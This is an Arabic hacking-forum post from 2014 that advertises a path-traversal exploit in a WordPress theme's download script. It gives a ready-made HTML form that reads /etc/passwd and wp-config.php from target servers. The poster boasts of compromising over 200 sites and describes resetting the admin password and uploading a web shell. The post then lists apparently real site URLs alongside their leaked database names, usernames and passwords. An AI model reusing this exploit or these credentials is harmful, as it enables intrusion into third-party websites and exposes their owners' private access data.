لحق ! ثغرة في Wordpress تخلك تقرا ملف ال wp-config.php
صفحة 1 من اصل 1
لحق ! ثغرة في Wordpress تخلك تقرا ملف ال wp-config.php
من طرف Admin الأربعاء يونيو 18, 2014 3:19 pm
ثغرة بتاريخ اليوم !!!!
ثغرة موجودة في المئات من المواقع !! لحق
احفظ ملف BeachKing.html بهذه الصيغة و المحتويات ...
تقدر تستخدم امر القراءة هذا لقراءة ملف الكونفك,,,,
كود بلغة HTML:
../../../../../wp-config.php
جربت الثغرة و الحمدلله طلع معي اكثر من 200 موقع عندي ال Config تبعهم ,, ^_^
طبعا تقدر تستخدم ملف الكونفك عن طريق الاتصال على القاعدة البيانات من حاسبتك و تعديل على يوزر الادمن و تغيير الباسورد ,, حتى تقدر تدخل اللوحة و ترفع الشيل ^_^
بعض المواقع المصابة ,,,,
كود:
ثغرة موجودة في المئات من المواقع !! لحق
احفظ ملف BeachKing.html بهذه الصيغة و المحتويات ...
- الكود:
<html>
<****><center>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="****" ****="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
<br><br>Beach King
</center>
</form>
</****>
</html>
تقدر تستخدم امر القراءة هذا لقراءة ملف الكونفك,,,,
كود بلغة HTML:
../../../../../wp-config.php
جربت الثغرة و الحمدلله طلع معي اكثر من 200 موقع عندي ال Config تبعهم ,, ^_^
طبعا تقدر تستخدم ملف الكونفك عن طريق الاتصال على القاعدة البيانات من حاسبتك و تعديل على يوزر الادمن و تغيير الباسورد ,, حتى تقدر تدخل اللوحة و ترفع الشيل ^_^
بعض المواقع المصابة ,,,,
كود:
- الكود:
http://www.zpesystems.com/wp-content/themes/infocus/images/
define('DB_****', 'zpesystems');
/** MySQL database user**** */
define('DB_USER', 'regood');
/** MySQL database password */
define('DB_PASSWORD', 'Ronic123!');
http://www.chambresdhotes-anjou.com/wp-content/themes/infocus/
define('DB_****', 'chambreshwnpat');
/** Utilisateur de la base de données MySQL. */
define('DB_USER', 'chambreshwnpat');
/** Mot de passe de la base de données MySQL. */
define('DB_PASSWORD', 'BNQAMv7e');
http://www.harmonyhouse.uk.com/wp-content/themes/infocus/images/icons/_banners/
define('DB_****', 'a-wor-292');
/** MySQL database user**** */
define('DB_USER', 'a-wor-292');
/** MySQL database password */
define('DB_PASSWORD', 'XnU-J/Yfx');
/** MySQL host**** */
define('DB_HOST', 'cust-mysql-123-14');
/** Database Charset to use in creating database tables. */
https://envisionitsolutions.com/wp-content/themes/infocus/images/icons/inset_silver/
define('DB_****', 'bettereitsnm');
/** MySQL database user**** */
define('DB_USER', 'user2344');
/** MySQL database password */
define('DB_PASSWORD', 'EvYIoocTlLakJtpjb04tYMfzBq');
/** MySQL host**** */
define('DB_HOST', 'new.eitsnm.com');
Admin- Admin
- عدد المساهمات : 111
تاريخ التسجيل : 17/06/2014 -
مواضيع مماثلة» شرح أختراق مواقع الوورد برس | Wordpress. بستخدام Kalilinux
» [لعشاق التخمين] تعال خمن على كل مواقع السيرفر الي مركبة wordpress
» [لعشاق التخمين] تعال خمن على كل مواقع السيرفر الي مركبة wordpress
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى